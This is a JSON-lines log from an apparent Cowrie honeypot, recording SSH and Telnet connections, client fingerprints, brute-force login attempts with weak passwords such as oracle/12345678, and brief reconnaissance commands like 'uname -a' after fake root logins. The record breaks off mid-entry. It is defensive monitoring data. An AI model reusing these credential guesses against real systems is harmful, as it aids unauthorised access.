{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35518,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcc05e6193f0","protocol":"ssh","message":"New connection: 212.227.235.229:35518 (1.2.3.4:22) [session: fcc05e6193f0]","sensor":"my-vps","timestamp":"2025-08-31T04:29:19.221535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:29:20.207461Z","src_ip":"212.227.235.229","session":"fcc05e6193f0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:29:20.208136Z","src_ip":"212.227.235.229","session":"fcc05e6193f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51714,"dst_ip":"1.2.3.4","dst_port":22,"session":"e859487e3604","protocol":"ssh","message":"New connection: 212.227.235.229:51714 (1.2.3.4:22) [session: e859487e3604]","sensor":"my-vps","timestamp":"2025-08-31T04:29:23.138699Z"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"12345678","message":"login attempt [oracle/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T04:29:25.960829Z","src_ip":"212.227.235.229","session":"fcc05e6193f0"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:29:27.740602Z","src_ip":"212.227.235.229","session":"fcc05e6193f0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60220,"dst_ip":"1.2.3.4","dst_port":22,"session":"85c3a82075a1","protocol":"ssh","message":"New connection: 217.72.205.35:60220 (1.2.3.4:22) [session: 85c3a82075a1]","sensor":"my-vps","timestamp":"2025-08-31T04:29:30.682281Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:29:30.683406Z","src_ip":"217.72.205.35","session":"85c3a82075a1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:29:31.655908Z","src_ip":"212.227.235.229","session":"e859487e3604"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:29:31.656584Z","src_ip":"212.227.235.229","session":"e859487e3604"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53764,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b835a0e584c","protocol":"ssh","message":"New connection: 212.227.125.160:53764 (1.2.3.4:22) [session: 2b835a0e584c]","sensor":"my-vps","timestamp":"2025-08-31T04:29:40.326284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:29:40.789915Z","src_ip":"212.227.125.160","session":"2b835a0e584c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:29:40.790716Z","src_ip":"212.227.125.160","session":"2b835a0e584c"}
{"eventid":"cowrie.session.connect","src_ip":"121.181.51.95","src_port":40622,"dst_ip":"1.2.3.4","dst_port":23,"session":"11ba1c91b8d7","protocol":"telnet","message":"New connection: 121.181.51.95:40622 (1.2.3.4:23) [session: 11ba1c91b8d7]","sensor":"my-vps","timestamp":"2025-08-31T04:29:40.924340Z"}
{"eventid":"cowrie.session.closed","duration":30.682474851608276,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:29:41.153516Z","src_ip":"212.227.125.160","session":"248b2b58e7fa"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"12345678","message":"login attempt [oracle/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T04:29:42.371030Z","src_ip":"212.227.125.160","session":"2b835a0e584c"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:29:43.881992Z","src_ip":"212.227.125.160","session":"2b835a0e584c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47426,"dst_ip":"1.2.3.4","dst_port":22,"session":"487404b874e9","protocol":"ssh","message":"New connection: 212.227.235.229:47426 (1.2.3.4:22) [session: 487404b874e9]","sensor":"my-vps","timestamp":"2025-08-31T04:29:46.511450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:29:46.512436Z","src_ip":"212.227.235.229","session":"487404b874e9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T04:29:46.610243Z","src_ip":"212.227.235.229","session":"487404b874e9"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX3edc","message":"login attempt [oracle/1qaz@WSX3edc] failed","sensor":"my-vps","timestamp":"2025-08-31T04:29:46.907841Z","src_ip":"212.227.235.229","session":"487404b874e9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:29:48.009019Z","src_ip":"212.227.235.229","session":"487404b874e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43744,"dst_ip":"1.2.3.4","dst_port":22,"session":"31f5b79fcc7d","protocol":"ssh","message":"New connection: 212.227.125.160:43744 (1.2.3.4:22) [session: 31f5b79fcc7d]","sensor":"my-vps","timestamp":"2025-08-31T04:30:00.654185Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35688,"dst_ip":"1.2.3.4","dst_port":22,"session":"893070c05379","protocol":"ssh","message":"New connection: 212.227.125.160:35688 (1.2.3.4:22) [session: 893070c05379]","sensor":"my-vps","timestamp":"2025-08-31T04:30:11.482559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:30:12.527180Z","src_ip":"212.227.125.160","session":"893070c05379"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:30:12.528637Z","src_ip":"212.227.125.160","session":"893070c05379"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42980,"dst_ip":"1.2.3.4","dst_port":22,"session":"321aa64ceeac","protocol":"ssh","message":"New connection: 212.227.235.229:42980 (1.2.3.4:22) [session: 321aa64ceeac]","sensor":"my-vps","timestamp":"2025-08-31T04:30:17.677246Z"}
{"eventid":"cowrie.login.success","username":"root","password":"fakepassword2","message":"login attempt [root/fakepassword2] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:30:18.350500Z","src_ip":"212.227.125.160","session":"893070c05379"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:30:18.420672Z","src_ip":"212.227.235.229","session":"321aa64ceeac"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:30:18.421892Z","src_ip":"212.227.235.229","session":"321aa64ceeac"}
{"eventid":"cowrie.session.closed","duration":38.12453842163086,"message":"Connection lost after 38 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:30:19.048812Z","src_ip":"121.181.51.95","session":"11ba1c91b8d7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:30:21.345930Z","src_ip":"212.227.125.160","session":"893070c05379"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-31T04:30:21.346740Z","src_ip":"212.227.125.160","session":"893070c05379"}
{"eventid":"cowrie.session.closed","duration":"20.7","message":"Connection lost after 20.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:30:21.372716Z","src_ip":"212.227.125.160","session":"31f5b79fcc7d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:30:22.597906Z","src_ip":"212.227.125.160","session":"893070c05379"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:30:22.599058Z","src_ip":"212.227.125.160","session":"893070c05379"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456789","message":"login attempt [oracle/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T04:30:24.350415Z","src_ip":"212.227.235.229","session":"321aa64ceeac"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:30:26.342374Z","src_ip":"212.227.235.229","session":"321aa64ceeac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35392,"dst_ip":"1.2.3.4","dst_port":22,"session":"dea7c84e3340","protocol":"ssh","message":"New connection: 212.227.235.229:35392 (1.2.3.4:22) [session: dea7c84e3340]","sensor":"my-vps","timestamp":"2025-08-31T04:30:28.484336Z"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":43778,"dst_ip":"1.2.3.4","dst_port":22,"session":"58a9abf01823","protocol":"ssh","message":"New connection: 201.148.180.50:43778 (1.2.3.4:22) [session: 58a9abf01823]","sensor":"my-vps","timestamp":"2025-08-31T04:30:30.237494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:30:31.213178Z","src_ip":"201.148.180.50","session":"58a9abf01823"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:30:31.214015Z","src_ip":"201.148.180.50","session":"58a9abf01823"}
{"eventid":"cowrie.login.success","username":"root","password":"fakepassword2","message":"login attempt [root/fakepassword2] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:30:37.245890Z","src_ip":"201.148.180.50","session":"58a9abf01823"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32992,"dst_ip":"1.2.3.4","dst_port":22,"session":"845e0d79ac96","protocol":"ssh","message":"New connection: 212.227.125.160:32992 (1.2.3.4:22) [session: 845e0d79ac96]","sensor":"my-vps","timestamp":"2025-08-31T04:30:39.091535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:30:39.605322Z","src_ip":"212.227.125.160","session":"845e0d79ac96"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:30:39.606023Z","src_ip":"212.227.125.160","session":"845e0d79ac96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:30:40.147131Z","src_ip":"201.148.180.50","session":"58a9abf01823"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T04:30:40.147968Z","src_ip":"201.148.180.50","session":"58a9abf01823"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-31T04:30:41.090014Z","src_ip":"212.227.235.229","session":"e859487e3604"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456789","message":"login attempt [oracle/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T04:30:42.043105Z","src_ip":"212.227.125.160","session":"845e0d79ac96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"2.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:30:42.227942Z","src_ip":"201.148.180.50","session":"58a9abf01823"}
{"eventid":"cowrie.session.closed","duration":"12.0","message":"Connection lost after 12.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:30:42.229111Z","src_ip":"201.148.180.50","session":"58a9abf01823"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:30:43.586432Z","src_ip":"212.227.125.160","session":"845e0d79ac96"}
{"eventid":"cowrie.session.closed","duration":"24.3","message":"Connection lost after 24.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:30:52.801786Z","src_ip":"212.227.235.229","session":"dea7c84e3340"}
{"eventid":"cowrie.session.closed","duration":"95.7","message":"Connection lost after 95.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:30:58.866330Z","src_ip":"212.227.235.229","session":"e859487e3604"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50590,"dst_ip":"1.2.3.4","dst_port":22,"session":"be2cb7ce847b","protocol":"ssh","message":"New connection: 212.227.235.229:50590 (1.2.3.4:22) [session: be2cb7ce847b]","sensor":"my-vps","timestamp":"2025-08-31T04:31:16.942605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:31:18.047441Z","src_ip":"212.227.235.229","session":"be2cb7ce847b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"